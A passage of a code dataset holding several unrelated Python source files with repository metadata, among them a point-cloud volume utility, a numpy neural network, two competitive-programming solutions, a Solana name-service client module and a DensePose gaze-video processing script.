255)\n arrow.rotate(self.direction_z.rotation, center = [0,0,0])\n arrow.translate(self.direction_z.translation)\n vis.add_geometry(arrow)\n if place_box:\n vis.add_geometry(self.prompt_box)\n opt = vis.get_render_option()\n opt.show_coordinate_frame = True\n vis.run()\n vis.destroy_window()\n\nclass package:\n def __init__(self) -> None:\n self.mesh_pcd = None\n self.pcd = None\n self.volume = 0\n self.obbox = None\n\n def load_from_mesh(self, path): \n self.mesh_pcd = o3d.io.read_triangle_mesh(path)\n self.mesh_pcd.paint_uniform_color(np.array([0, 255, 0]))\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(np.asarray(self.mesh_pcd.vertices))\n self.mesh_pcd = pcd\n \n def get_obbox(self):\n self.obbox = o3d.geometry.OrientedBoundingBox.create_from_points(self.pcd.points)\n self.obbox.color = [1,0,1]\n\n\n def load_pcd(self, pcd):\n self.pcd = pcd\n\n def cal_vlm(self, transform, grid_size = 0.000005):\n local_pcd = copy.deepcopy(self.pcd)\n local_pcd.transform(transform)\n print(\"getting {} points\".format(np.array(local_pcd.points).shape[0]))\n\n # vis = o3d.visualization.Visualizer()\n # vis.create_window()\n # vis.add_geometry(local_pcd)\n # x = o3d.geometry.TriangleMesh.create_sphere(radius=0.00002)\n # green_color = np.array([0, 255, 0])\n # x.paint_uniform_color(green_color / 255)\n # vis.add_geometry(x)\n # opt = vis.get_render_option()\n # vis.run()\n # vis.destroy_window()\n \n pt_max = local_pcd.get_max_bound()\n pt_min = local_pcd.get_min_bound()\n print(\"max {}, min {}\".format(pt_max, pt_min))\n print(\"getting {} points\".format(np.array(local_pcd.points).shape[0]))\n x_size = int((pt_max[0] - pt_min[0]) / grid_size) + 1\n y_size = int(pt_max[1] - pt_min[1] / grid_size) + 1\n volume = 0\n grid_count = 0\n grid_avg_z = 0\n point_count = 0\n print(\"Total grid {} x_size: {} y_size: {}\".format(x_size * y_size, x_size, y_size))\n for i in range(0, x_size):\n for j in range(0, y_size):\n min_bound = [pt_min[0]+i*grid_size, pt_min[1]+j*grid_size, -0.001]\n max_bound = [pt_min[0]+(i+1)*grid_size, pt_min[1]+(j+1)*grid_size, pt_max[2]*5]\n bbox = o3d.geometry.AxisAlignedBoundingBox(min_bound, max_bound)\n temp_points = np.array(local_pcd.crop(bbox).points)\n point_count += temp_points.shape[0]\n if temp_points.shape[0] > 0:\n avg = np.average(temp_points, axis = 0)\n grid_avg_z += avg[2]\n volume += grid_size * grid_size * avg[2] * 1e9\n grid_count += 1\n print(\"Grid in to sys {} avg_size {} point_sum {}\".format(grid_count, grid_avg_z/grid_count*1000, point_count))\n return volume\n\n def viz(self):\n vis = o3d.visualization.Visualizer()\n vis.create_window()\n if self.pcd:\n vis.add_geometry(self.pcd)\n if self.mesh_pcd:\n vis.add_geometry(self.mesh_pcd)\n if self.obbox:\n vis.add_geometry(self.obbox)\n \n r = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n r.translate([1, 0, 0])\n r.paint_uniform_color([1,0,0])\n vis.add_geometry(r)\n g = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n g.translate([0, 1, 0])\n g.paint_uniform_color([0,1,0])\n vis.add_geometry(g)\n b = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n b.translate([0, 0, 1])\n b.paint_uniform_color([0,0,1])\n vis.add_geometry(b)\n y = o3d.geometry.TriangleMesh.create_sphere(radius=0.02)\n y.translate([0, 0, 0])\n y.paint_uniform_color([0,1,1])\n vis.add_geometry(y)\n\n\n opt = vis.get_render_option()\n # opt.show_coordinate_frame = False\n vis.run()\n vis.destroy_window()","repo_name":"ZerenYu/SheetPickup","sub_path":"scripts/placement_util.py","file_name":"placement_util.py","file_ext":"py","file_size_in_byte":13324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26419620680","text":"from matplotlib import pyplot as plt\nimport run\nimport numpy as np\n\n\"\"\"\n vectorized sigmoid function\n\"\"\"\n@np.vectorize\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\"\"\"\n vectorized tanh function\n\"\"\"\n@np.vectorize\ndef tanh(x):\n return np.tanh(x)\n\n\"\"\"\n vectorized LeakyReLU\n\"\"\"\n@np.vectorize\ndef leakyReLU(x, k = 0.05):\n return x if x > 0 else x * k\n\n\"\"\"\n vectorized sigmoid_prime\n\"\"\"\n@np.vectorize\ndef sigmoid_prime(x):\n return x * (1.0 - x)\n\n\"\"\"\n vectorized tanh_prime\n\"\"\"\n@np.vectorize\ndef tanh_prime(x):\n return 1.0 - np.square(np.tanh(x))\n\n\"\"\"\n vectorized leakyReLU prime\n\"\"\"\n@np.vectorize\ndef leakyReLu_prime(x, k = 0.05):\n return k if x < 0 else 1.0\n\nactivation_function = tanh\nactivation_function_prime = tanh_prime\n\n\n\"\"\"\n vecotrized softmax function\n\"\"\"\n@np.vectorize\ndef softmax(x):\n return np.exp(x) / np.exp(x).sum()\n\n\n\n\"\"\"\n simple random value generator\n\"\"\"\nfrom scipy.stats import truncnorm\ndef truncated_normal(mean = 0, sd = 1, low = 0, upp = 10):\n return truncnorm( (low - mean) / sd, (upp - mean) / \n sd, loc = mean, scale = sd)\n\"\"\"\n Euclidean loss function\n\"\"\"\ndef loss(output, target):\n return np.sum((target - output)**2)\n\nclass NeuralNetwork:\n \n \"\"\"\n pre - layers = array of node-count for each layer in the NN\n len(layers) > 2\n layers[0] >= 2\n learning_rate = rate used in training\n learning_rate != 0\n post - initialize local variables, call initialize_net()\n \"\"\"\n def __init__(self, layers, learning_rate):\n self.layers = layers\n self.learning_rate = learning_rate\n self.initialize_net()\n \n \"\"\"\n Initializes the neural network with given input/output and hidden layers.\n For matrix implementation, this means to initialize the weight matrices\n For now, hidden layer will have a steping size of input_size to output_size\n pre - layers[0] > layers[len(layers) - 1]\n post - initialized weight_matrices with random values\n \"\"\"\n def initialize_net(self):\n self.weight_matrices = []\n #calculate average deviation\n rad = 1 / np.sqrt(self.layers[0])\n #create rv_continous object (random variates)\n W = truncated_normal(mean = 2, sd = 1, low = -rad, upp = rad)\n for i in range(len(self.layers) - 1):\n #use W to generate random value matrices, dim = layer[i + 1] x layer[i] + 1 for bias\n self.weight_matrices.append(np.array(W.rvs((self.layers[i + 1], \n self.layers[i] + 1))))\n print(\"Initializing weight matrices to random values\\n\")\n\n \"\"\"\n Train the neural network with a single input/target_vector pair\n vectors can be tuples, lists, or ndarray\n \"\"\"\n def train(self, input_vector, target_vector):\n #turning arrays into column vectors\n target_vector = np.array(target_vector, ndmin=2).T\n output_mat = self.run(input_vector)\n output_vector = output_mat[-1]\n input_vector = np.array(input_vector, ndmin=2).T\n\n #implement backpropagtion\n dE_do = output_vector - target_vector #[out x 1] vector\n dW = self.back_propagation(dE_do, output_mat, dW = [])\n\n\n #update weights\n for i in range(len(dW)):\n #print(\"dW = %s, W = %s\" %(dW[i].shape, self.weight_matrices[i].shape))\n self.weight_matrices[i] += dW[i] * (-1) * self.learning_rate\n \n #return loss\n return loss(output_vector, target_vector)\n \n \"\"\"\n Performs back-propagation on the network given recursively\n dW = matrix of dW for each ***neuron***\n dE_do = partial derivative of error in terms of the sigmoid(o)\n output_mat = matrix of outputs for each layer it went through\n Base case: dW = [], dErr_do = (y - t).\n This happens when we are finding error for the weights\n leading to the output, or the last matrix\n Recursive case: dW = [some matrix], dE_do = dW_vector from layer after\n This happens for every intermediate layer + input layer\n\n \"\"\"\n def back_propagation(self, dErr_do, output_mat, i = 1, dW = []):\n dW_mat = []\n\n #current\n output_vector = output_mat[-(i)]\n #remove bias from calculation\n if(i != 1):\n output_vector = np.delete(output_vector, -1, axis = 0)\n #partial of current layer in terms of activation function\n do_dnet = activation_function_prime(output_vector)\n #do_dnet = output_vector * ( 1 - output_vector )\n #neuron value on layer before\n dnet_dw = output_mat[-(i + 1)] \n #calculate weights for current layer\n #dE/dw = dE/do o do/dnet x (dnet/dw).T\n #print(\"dErr_do = %s, do_dnet = %s, dnet_dw = %s\\n\" %(dErr_do.shape, do_dnet.shape, dnet_dw.shape,))\n dW_mat = (dErr_do * do_dnet).dot(dnet_dw.T)\n #dW_mat should have same dimensions as weight_matrices[i->j]\n\n #insert calculated dw\n dW.insert(0, dW_mat)\n\n #recurse if i < len(output_mat) --> 1+ weight matrix left\n if(i + 1 < len(output_mat)):\n #prepare dErr_do for next recurisve call\n #weights from prev layer j to all nodes this layer except the bias column\n wnetl = np.array(np.sum(np.delete(self.weight_matrices[-(i)], -1, axis=1), axis=0), ndmin=2).T\n #print(\"dErr_do = %s, do_dnet = %s, dnet_dw = %s\\n\" %(dErr_do.shape, do_dnet.shape, wnetl.shape,))\n #hadamard multiply dErr/doL o doL/dnetL o wnetL\n dErr_do = np.sum(dErr_do * do_dnet) * wnetl\n dW = self.back_propagation(dErr_do, output_mat, i+1, dW)\n\n return dW\n\n \"\"\"\n trains the network for a fixed number of epochs or until it reaches a loss threshold\n train = [ \n [[inputa1, inputa2...],[inputb1, inputb2...],...] , \n [[targeta1,targeta2,...],[targetb1,targetb2,...],...] \n ]\n if n_epochs = 0, runs until error is below threshold, else run max n_epoch times or\n until error reaches threshold\n \"\"\"\n def train_network(self, train, n_epochs = 0, threshold=0.1):\n epochs = 0\n print(\"Starting to train for %d, or when the error is below %.3f\\n\\n\" %(n_epochs, threshold))\n while 1:\n #reset sumError\n sumError = 0\n\n #train for each training set\n for i in range(len(train[0])):\n sumError += self.train(train[0][i], train[1][i])\n sumError /= (len(train[0]))\n\n #check if sumError is less than threshold or if n_epochs exceeded\n if (n_epochs != 0 and epochs >= n_epochs) or sumError <= threshold:\n break\n print(\"Epochs = %d, Error = %.7f\" %(epochs, sumError))\n epochs += 1\n print(\"Finished training\\n n_epochs = %d\\n sumError = %.5f\\n\\n\" %(epochs, sumError))\n\n \"\"\"\n Run the network with an input vector\n input_vector can be a tuple, list, or ndarray\n pre - len(input_vector) == layor[0]\n len(input_vector) >= 2\n post - output_vector calculated from weight_matrices\n \"\"\"\n def run(self, input_vector):\n #turning array into column vectors\n output_vector = np.array(input_vector, ndmin=2).T\n #add bias to input\n output_vector = np.vstack((output_vector,np.array([1])))\n output_mat = [output_vector]\n for i in range(len(self.weight_matrices)):\n \n #matrix multiplying for each weight matrix\n output_vector = self.weight_matrices[i].dot(output_vector)\n #passing result through the activation function\n output_vector = activation_function(output_vector)\n #output_vector = reLU(output_vector)\n if i != len(self.weight_matrices) - 1:\n #add bias to input\n output_vector = np.vstack((output_vector,np.array([1])))\n #add calculated vector to matrix\n output_mat.append(output_vector)\n return output_mat\n\n\n \"\"\"\n user-call method for running the Neural net for given input\n \"\"\"\n def predict(self, input):\n out = self.run(input)\n return out[-1]\n\n def get_network(self):\n return self.weight_matrices\n\n def load_network(self, W):\n self.weight_matrices = W\n\nif __name__ == \"__main__\":\n nn = NeuralNetwork(layers = [5, 4, 3], learning_rate = 0.1)\n out = nn.train_network([[[1, 2, 3, 4, 5]], [[1, 0, 1]]], n_epochs=100)\n print(\"Out : \", out)\n","repo_name":"harennon/neural-net","sub_path":"src/NeuralNet.py","file_name":"NeuralNet.py","file_ext":"py","file_size_in_byte":8626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6274520131","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 26 23:51:35 2022\r\n\r\n@author: salma obeidat\r\n\"\"\"\r\n\r\nt=int(input())\r\nfor i in range(t):\r\n n=int(input())\r\n a=list(map(int,input().split()))\r\n odd=0\r\n for i in range(len(a)):\r\n if(a[i]%2!=0):\r\n odd+=1\r\n if(odd==n):\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n \r\n#the sum of even and odd numbers is odd ,so if we have\r\n#2n set we n even numbers and n odd numbers to let me have\r\n#n sets with odd sum for each ","repo_name":"salmaobeidat/code-forces","sub_path":"1542A - Odd Set.py","file_name":"1542A - Odd Set.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26106163059","text":"import sys\nfrom collections import deque\n\n\ndef bfs(N, K, check):\n q = deque()\n q.append((N, 0))\n check[N] = True\n\n while q:\n N, time = q.popleft()\n if N == K:\n return time\n for next in [N - 1, N + 1, N * 2]:\n if 0 <= next < 100001 and not check[next]:\n q.append((next, time + 1))\n check[next] = True\n\n\ndef solution():\n N, K = map(int, sys.stdin.readline().split())\n check = [False] * 200001\n\n print(bfs(N, K, check))\n\n\nsolution()\n","repo_name":"Kwakcena/codeplus-SW-competency","sub_path":"그래프/숨바꼭질/baekjoon-1697.py","file_name":"baekjoon-1697.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19350529270","text":"\"\"\"\nHigh level interface for all Solana-related interactions with SPL Name Service.\n\nSome of these are nothing but cleaned up output to RPC calls.\nOthers are actual blockchain transactions with potentially\nmany RPC calls to acquire necessary data for those transactions.\n\nAt a high level, this is the CRUD interface of our SPLNS \"databasing\".\n\"\"\"\nfrom base64 import b64decode\nfrom typing import Optional, Union, Any\n\nfrom solana.rpc.api import Client\nfrom solana.rpc.exception import SolanaException\nfrom solana.account import Account\nfrom solana.publickey import PublicKey\nfrom solana.transaction import Transaction\nfrom solana.system_program import SYS_PROGRAM_ID\n\nfrom sol_namespace.name_model import NamespaceNode\nfrom sol_namespace import instruction\n\n\nTxId = str\nRawTx = bytes\nOperation = Union[TxId, RawTx]\n\n\ndef create(\n client: Client,\n name: NamespaceNode,\n funder: Account,\n *signers: Account,\n populate: bool=True,\n raw: bool=False\n ) -> Optional[Operation]:\n \"\"\"\n Create a name account on chain. By default, also populate it with data.\n\n Optionally, return a signed raw transaction instead of directly sending it.\n \"\"\"\n tx = Transaction()\n tx.add(instruction.create_instruction(name))\n if populate:\n tx.add(instruction.update_instruction(name))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(funder)\n for signer in signers:\n tx.sign(signer)\n return tx.serialize()\n # Otherwise just send the transaction\n try:\n response = client.send_transaction(tx, funder)\n except SolanaException as e:\n logs = e.data.get('data', {}).get('logs', [])\n # TODO More efficient/informative error parsing here\n if 'Program log: Instruction: Create' in logs and \\\n 'Program log: The given name account already exists.' in logs:\n print(\"Error -- Name Create: name account already exists\")\n return None\n return response['result']\n\n\ndef update(\n client: Client,\n name: NamespaceNode,\n signer: Account,\n raw=False) -> Optional[Operation]:\n \"\"\"\n Repopulate the entirety of the data under a name account.\n\n Optionally, return a signed raw transaction instead of directly sending it.\n \"\"\"\n # Ensure the correct signer is passed in\n if name.class_account != SYS_PROGRAM_ID:\n assert signer.public_key() == name.class_account\n else:\n assert signer.public_key() == name.owner_account\n tx = Transaction()\n tx.add(instruction.update_instruction(name))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef update_bytes(\n client: Client,\n name: NamespaceNode,\n signer: Account,\n input_data: bytes,\n offset: int=0,\n raw=False) -> Optional[Operation]:\n \"\"\"\n Custom update to the data under a name account.\n Requires specifying the starting offset byte-index, and the raw bytes to write.\n\n Signer is either the owner of the account, or the class account if it's not\n default.\n \"\"\"\n # Ensure the correct signer is passed in\n if name.class_account != SYS_PROGRAM_ID:\n assert signer.public_key() == name.class_account\n else:\n assert signer.public_key() == name.owner_account\n tx = Transaction()\n tx.add(instruction.update_instruction(name, offset=offset, input_data=input_data))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef delete_name(\n client: Client,\n name: NamespaceNode,\n signer: Account, # must correspond to name.owner_account\n refund_to: PublicKey=None,\n raw: bool=False) -> Optional[Operation]:\n \"\"\"\n Delete a namespace node.\n \"\"\"\n assert name.owner_account == signer.public_key(), \"Must sign name deletion with account owner.\"\n tx = Transaction()\n tx.add(instruction.delete_instruction(name, refund_to=refund_to))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n return tx.serialize()\n\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\ndef transfer_name(\n client: Client,\n name: NamespaceNode,\n new_owner: PublicKey,\n signer: Account, # must correspond to name.owner_account\n class_account_signer: Account=None,\n raw: bool=False) -> Optional[Operation]:\n \"\"\"\n Transfer a namespace node to a new owner.\n \"\"\"\n tx = Transaction()\n tx.add(instruction.transfer_instruction(name, new_owner=new_owner))\n if raw:\n tx.recent_blockhash = client.get_recent_blockhash()['result']['value']['blockhash']\n tx.sign(signer)\n if class_account_signer is not None:\n assert name.class_account != SYS_PROGRAM_ID, \"Invalid name class account signer\"\n tx.sign(class_account_signer)\n return tx.serialize()\n\n if class_account_signer is not None:\n assert name.class_account != SYS_PROGRAM_ID, \"Cannot specify class account signer on this name\"\n response = client.send_transaction(tx, signer, class_account_signer)\n else:\n response = client.send_transaction(tx, signer)\n return response['result']\n\n\n\ndef get_name_data(client: Client, name: NamespaceNode) -> Any:\n \"\"\"\n Look up account data, deserialize it.\n \"\"\"\n response = client.get_account_info(name.account, encoding='jsonParsed')\n value = response['result']['value']\n if value is None:\n print(f\"{name.account} not found\")\n return None\n data = value['data'][0]\n data = b64decode(data)\n data = data[96:]\n return type(name.data).deserialize(data)\n\n\nSOL_PRICE_USD = 40\nBASE_AMT = 89088 # Minimum rent-exempt balance for accounts with no extra data allocation.\nPER_BYTE = 696 # at 348 lamports per byte-year\nLAMPORTS_PER_SOL = 100000000 # 100 million lamports = 1 SOL\n\ndef estimate_cost(\n n_bytes: int,\n sol_price_usd: float=SOL_PRICE_USD\n ) -> float:\n \"\"\"\n Estimate dollar value of minimum rent-exempt balance\n to store `n_bytes` in a Solana account.\n \"\"\"\n return sol_price_usd * (BASE_AMT + (n_bytes * PER_BYTE)) / LAMPORTS_PER_SOL\n","repo_name":"Auguron/sol_namespace","sub_path":"sol_namespace/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":6629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21574688515","text":"import argparse\nimport glob\nimport logging\nimport os\nimport struct\nfrom fractions import Fraction\n\nimport av\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom pupil_labs.dynamic_content_on_rim.uitools.ui_tools import get_path, get_savedir\nfrom pupil_labs.dynamic_content_on_rim.video.read import get_frame, read_video_ts\nfrom rich.logging import RichHandler\nfrom rich.progress import Progress\n\nimport pupil_labs.dense_pose.pose as pose\nimport pupil_labs.dense_pose.vis as pl_dp_vis\nfrom pupil_labs.dense_pose.parser import init_parser\n\nlogging.basicConfig(\n format=\"%(message)s\",\n datefmt=\"[%X]\",\n level=logging.INFO,\n handlers=[RichHandler(rich_tracebacks=True)],\n)\nlogger = logging.getLogger()\n\n# Check if they are using a 64 bit architecture\nverbit = struct.calcsize(\"P\") * 8\nif verbit != 64:\n error = \"Sorry, this script only works on 64 bit systems!\"\n raise Exception(error)\n\n\n# Main call function\ndef main(args=None):\n if args is None:\n # Parse arguments\n parser = init_parser()\n args = parser.parse_args()\n logging.info(\n \"[white bold on #0d122a]◎ DensePose Module by Pupil Labs[/]\",\n extra={\"markup\": True},\n )\n logging.info(\n \"[white bold on #4267B2]∞ Using detectron's libraries by Meta AI[/]\",\n extra={\"markup\": True},\n )\n if args.override:\n logging.info(\n \"[white bold on red]⚠️ Running in override mode, this is not officially supported ⚠️[/]\",\n extra={\"markup\": True},\n )\n logging.info(f\"Arguments: {args}\")\n if args.input_path is None:\n args.input_path = get_path(\n \"Select the video folder in the raw directory\", \"world_timestamps.csv\", None\n )\n logging.info(f\"Input path: {args.input_path}\")\n\n # Format to read timestamps\n oftype = {\"timestamp [ns]\": np.uint64}\n\n # Read the timestamps\n world_timestamps_df = pd.read_csv(\n os.path.join(args.input_path, \"world_timestamps.csv\"), dtype=oftype\n )\n if not args.override:\n events_df = pd.read_csv(\n os.path.join(args.input_path, \"events.csv\"), dtype=oftype\n )\n gaze_df = pd.read_csv(os.path.join(args.input_path, \"gaze.csv\"), dtype=oftype)\n files = glob.glob(os.path.join(args.input_path, \"*.mp4\"))\n if len(files) != 1:\n error = \"There should be only one video in the raw folder!\"\n raise Exception(error)\n video_path = files[0]\n else:\n events_df = pd.read_csv(\n os.path.join(args.input_path, \"annotations.csv\"), dtype=oftype\n )\n gaze_df = pd.read_csv(\n os.path.join(args.input_path, \"gaze_positions.csv\"), dtype=oftype\n )\n video_path = os.path.join(args.input_path, \"world.mp4\")\n\n # Read the video\n logging.info(\n \"[white bold on #0d122a]Reading video...[/]\",\n extra={\"markup\": True},\n )\n _, frames, pts, ts = read_video_ts(video_path)\n logging.info(\n \"[white bold on #0d122a]Reading audio...[/]\",\n extra={\"markup\": True},\n )\n with av.open(video_path) as v:\n if not v.streams.audio:\n logging.warning(\"No audio stream found!\")\n audio_stream_available = False\n else:\n audio_stream_available = True\n\n if audio_stream_available:\n _, audio_frames, audio_pts, audio_ts = read_video_ts(\n video_path, audio=True, auto_thread_type=False\n )\n ts = (\n world_timestamps_df[\"timestamp [ns]\"]\n if not args.override\n else world_timestamps_df[\"# timestamps [seconds]\"]\n )\n if args.override:\n logging.info(\n \"[white bold on red]Renaming some columns...[/]\",\n extra={\"markup\": True},\n )\n gaze_df.rename(\n {\n \"gaze_timestamp\": \"timestamp [ns]\",\n \"norm_pos_x\": \"gaze x [px]\",\n \"norm_pos_y\": \"gaze y [px]\",\n },\n axis=1,\n inplace=True,\n )\n gaze_df[\"timestamp [ns]\"] = gaze_df[\"timestamp [ns]\"].map(lambda x: x * 1e9)\n ts = ts * 1e9\n events_df.rename(\n {\n \"timestamp\": \"timestamp [ns]\",\n \"label\": \"name\",\n },\n axis=1,\n inplace=True,\n )\n events_df[\"timestamp [ns]\"] = events_df[\"timestamp [ns]\"].map(lambda x: x * 1e9)\n\n video_df = pd.DataFrame(\n {\n \"frames\": np.arange(frames),\n \"pts\": [int(pt) for pt in pts],\n \"timestamp [ns]\": ts,\n }\n )\n if audio_stream_available:\n audio_ts = audio_ts + ts[0]\n audio_df = pd.DataFrame(\n {\n \"frames\": np.arange(audio_frames),\n \"pts\": [int(pt) for pt in audio_pts],\n \"timestamp [ns]\": audio_ts,\n }\n )\n logging.info(\"Merging dataframes\")\n merged_video = pd.merge_asof(\n video_df,\n gaze_df,\n on=\"timestamp [ns]\",\n direction=\"nearest\",\n suffixes=[\"video\", \"gaze\"],\n )\n if audio_stream_available:\n merged_audio = pd.merge_asof(\n audio_df,\n video_df,\n on=\"timestamp [ns]\",\n direction=\"nearest\",\n suffixes=[\"audio\", \"video\"],\n )\n # Chop, chop, chop! (use only the in between events data)\n if args.start != \"recording.begin\":\n logging.info(f\"Looking for start event: {args.start}\")\n if not events_df[\"name\"].isin([args.start]).any():\n raise Exception(\"Start event not found!\")\n else:\n start = events_df[events_df[\"name\"] == args.start][\"timestamp [ns]\"].values[\n 0\n ]\n merged_video = merged_video[merged_video[\"timestamp [ns]\"] >= start]\n if audio_stream_available:\n merged_audio = merged_audio[merged_audio[\"timestamp [ns]\"] >= start]\n logging.info(f\"Starting at {args.start}\")\n if args.end != \"recording.end\":\n logging.info(f\"Looking for end event: {args.end}\")\n if not events_df[\"name\"].isin([args.end]).any():\n raise Exception(\"End event not found!\")\n else:\n end = events_df[events_df[\"name\"] == args.end][\"timestamp [ns]\"].values[0]\n merged_video = merged_video[merged_video[\"timestamp [ns]\"] <= end]\n if audio_stream_available:\n merged_audio = merged_audio[merged_audio[\"timestamp [ns]\"] <= end]\n logging.info(f\"Ending at {args.end}\")\n\n # Read first frame\n with av.open(video_path) as vid_container:\n logging.info(\"Reading first frame\")\n vid_frame = next(vid_container.decode(video=0))\n if audio_stream_available:\n aud_frame = next(vid_container.decode(audio=0))\n\n num_processed_frames = 0\n\n if args.override:\n logging.info(\"Geting gaze coordinates on image from normalized coordinates\")\n merged_video[\"gaze x [px]\"] = merged_video[\"gaze x [px]\"].map(\n lambda x: x * vid_frame.width\n )\n merged_video[\"gaze y [px]\"] = merged_video[\"gaze y [px]\"].map(\n lambda y: (1 - y) * vid_frame.height\n )\n\n # Get the output path\n if args.output_path is None:\n args.output_file = get_savedir(None, type=\"video\")\n args.out_csv = args.output_file.replace(\n os.path.split(args.output_file)[1], \"densepose.csv\"\n )\n args.output_path = os.path.split(args.output_file)[0]\n else:\n args.output_file = os.path.join(args.output_path, \"densepose.mp4\")\n args.out_csv = os.path.join(args.output_path, \"densepose.csv\")\n logging.info(f\"Output path: {args.output_file}\")\n\n # Get the model ready\n predictor, visualizer, extractor, cfg = pose.setup_config(\n args.confidence, args.device\n )\n\n # Here we go!\n with av.open(video_path) as video, av.open(video_path) as audio, av.open(\n args.output_file, \"w\"\n ) as out_container:\n logging.info(\"Ready to process video\")\n # Prepare the output video\n out_video = out_container.add_stream(\"libx264\", rate=30, options={\"crf\": \"18\"})\n out_video.width = video.streams.video[0].width\n out_video.height = video.streams.video[0].height\n out_video.pix_fmt = \"yuv420p\"\n out_video.codec_context.time_base = Fraction(1, 30)\n if audio_stream_available:\n out_audio = out_container.add_stream(\"aac\", layout=\"stereo\")\n out_audio.rate = audio.streams.audio[0].rate\n out_audio.time_base = out_audio.codec_context.time_base\n lpts = -1\n # For every frame in the video\n with Progress() as progress_bar:\n video_task = progress_bar.add_task(\n \"📹 Processing video\", total=merged_video.shape[0]\n )\n poses_task = progress_bar.add_task(f\"🤸‍♀️ Estimating poses\")\n while num_processed_frames < merged_video.shape[0]:\n row = merged_video.iloc[num_processed_frames]\n # Get the frame\n vid_frame, lpts = get_frame(video, int(row[\"pts\"]), lpts, vid_frame)\n if vid_frame is None:\n break\n img_original = vid_frame.to_ndarray(format=\"rgb24\")\n # Prepare the frame\n frame = cv2.cvtColor(img_original, cv2.COLOR_RGB2BGR)\n frame = np.asarray(frame, dtype=np.float32)\n frame = frame[:, :, :]\n xy = row[[\"gaze x [px]\", \"gaze y [px]\"]].to_numpy(dtype=np.int32)\n # Get the densepose data\n if args.inference and num_processed_frames == 0:\n import torch\n\n if torch.cuda.is_available():\n logging.info(\"Creating logger for inference times\")\n starter, ender = torch.cuda.Event(\n enable_timing=True\n ), torch.cuda.Event(enable_timing=True)\n repetitions = 400\n timings = np.zeros((repetitions, 1))\n else:\n error = (\n \"CUDA not available, disable inference with --no-inference\"\n )\n logging.error(error)\n raise Exception(error)\n elif not args.inference and num_processed_frames == 0:\n starter, ender, timings = None, None, None\n\n (\n frame,\n _,\n id_name,\n starter,\n ender,\n timings,\n poses_task,\n ) = pose.get_densepose(\n frame,\n predictor,\n visualizer,\n extractor,\n cfg,\n xy,\n starter,\n ender,\n timings,\n args.circle_size,\n frameid=num_processed_frames,\n progress_bar=progress_bar,\n poses_task=poses_task,\n ) # frame must be BGR\n\n # Add id_name to the dataframe\n merged_video.loc[num_processed_frames, \"densepose\"] = id_name\n # Add the closest annotation\n current_ts = row[\"timestamp [ns]\"]\n # Find the closest event name using the timestamp\n closest_event = events_df.iloc[\n (events_df[\"timestamp [ns]\"] - current_ts).abs().argsort()[:1]\n ]\n merged_video.loc[\n num_processed_frames, \"closest_annotation\"\n ] = closest_event[\"name\"].values[0]\n # make a circle on the gaze\n if not np.isnan(xy).any():\n cv2.circle(frame, xy, args.circle_size, (0, 0, 255), 10)\n\n # Finally get the frame ready.\n out_ = cv2.normalize(frame, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n if args.vis:\n cv2.imshow(\"Merged Video\", out_)\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n break\n # Convert to av frame\n cv2.cvtColor(out_, cv2.COLOR_BGR2RGB, out_)\n np.expand_dims(out_, axis=2)\n out_frame = av.VideoFrame.from_ndarray(out_, format=\"rgb24\")\n for packet in out_video.encode(out_frame):\n out_container.mux(packet)\n if num_processed_frames % 100 == 0:\n logging.info(\n f\"Processed {num_processed_frames} frames out of {merged_video.shape[0]}\"\n )\n progress_bar.advance(video_task)\n progress_bar.refresh()\n num_processed_frames += 1\n progress_bar.stop_task(video_task)\n for packet in out_video.encode(None):\n out_container.mux(packet)\n if args.inference:\n logging.info(\n f\"Mean inference time: {np.sum(timings) / repetitions } per frame\"\n )\n logging.info(f\"STD inference time: {np.std(timings)} per frame\")\n progress_bar.remove_task(poses_task)\n # audio\n if audio_stream_available:\n audio_task = progress_bar.add_task(\n \"🔊 Processing audio\", total=merged_audio.shape[0]\n )\n num_processed_frames = 0\n lpts = -1\n while num_processed_frames < merged_audio.shape[0]:\n row = merged_audio.iloc[num_processed_frames]\n aud_frame, lpts = get_frame(\n audio, int(row[\"ptsaudio\"]), lpts, aud_frame, audio=True\n )\n if aud_frame is None:\n break\n aud_frame.pts = None\n af = out_audio.encode(aud_frame)\n out_container.mux(af)\n num_processed_frames += 1\n progress_bar.advance(audio_task)\n progress_bar.refresh()\n progress_bar.stop_task(audio_task)\n for packet in out_audio.encode(None):\n out_container.mux(packet)\n out_container.close()\n # save the csv\n merged_video.to_csv(args.out_csv, index=False)\n logging.info(f\"CSV file saved at: {args.out_csv}\")\n # Save the visualisation Gazemap\n pl_dp_vis.report(merged_video, args.output_path)\n logging.info(\n \"[white bold on #0d122a]◎ Mischief managed! ⚡️[/]\",\n extra={\"markup\": True},\n )\n\n\nif __name__ == \"__main__\":\n 